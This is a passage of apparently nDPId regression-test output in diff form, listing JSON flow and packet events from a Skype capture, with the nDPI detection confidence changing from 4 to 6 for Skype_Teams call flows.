+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659988,"flow_last_seen":1431969659988,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969659988,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431969659988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969659988,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnVAAEAGLQHAqAEi1cezr8N3Abvoukp8AAAAALAC\/\/\/lagAAAgQFtAEDAwUBAQgKPiLPxAAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1431969660053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969660053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7w3fqOPcW6LpKfaASOJBSzgAAAgQFrAQCCApO2zrZPiLPxAEDAwk="} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1431969660053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969660053,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KCpAAEAGx1jAqAEi1cezr8N3Abvoukp96jj3F4AQECyptwAAAQEICj4i0AVO2zrZ"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4bnAAAEARKjLAqAEiQTffETLdnFYAJDJym9gCRkbR2cp0xkwlV8oyn8X0NKXbrbkoGiloQw=="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4jIYAAEAR1MHAqAEiQAQXnzLdnEkAJMXJm9oCsTdSNq2fp4IomM1W0LtS\/XasnVb1cYIFcA=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA496cAAEAROH3AqAEinTfrjjLdnFkAJNtLm9wCCq\/Vr9SUD4fwmmEiNdezuQ9niYUSk+YjJQ=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3fJEAAEARs5PAqAEinTfrjzLdnF4AIz7Dm94CUldClJ3Jj\/ar7UJqBheNPI8TcYWyskFm"} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy3tIAAEARCNHAqAEinTg0FTLdnEQAHrtxm+ACoNYW9c0Iu96VtPV4yMd9SlxQuA=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+WsgAAEARoKjAqAEib91NlzLdnFsAKnZMm+IChMIMA7Iu2mZsqQZJnqfJooyOMKE\/uWGoix8bU\/YAAA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"skype.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/HyoAAEARyHDAqAEinTg0ETLdnE0AK6EGm+QCNgMH2ITpxVJW+XmKXJHtTvzd6uYJCxFPw1m4ZheLNng="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2iHEAAEAR2M3AqAEiQAQXqjLdnEsAIkoGm+YCpGAFhs2RBCMUexQexYbsFkqmQ\/8Qtyc="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2+lgAAEARAQ\/AqAEib91NqDLdnEcAIop9m+gChrJ8v\/omTh7Ne4Bar5T53RvLKUpGcwE="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431969661414,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969661414,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5wkwAAEARPJTAqAEib91KLDLdnF8AJV5Dm+oCagLaZIeW7H9EIxc7czPbdaN+lYkEZAqCu0Q="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"skype.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969661414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 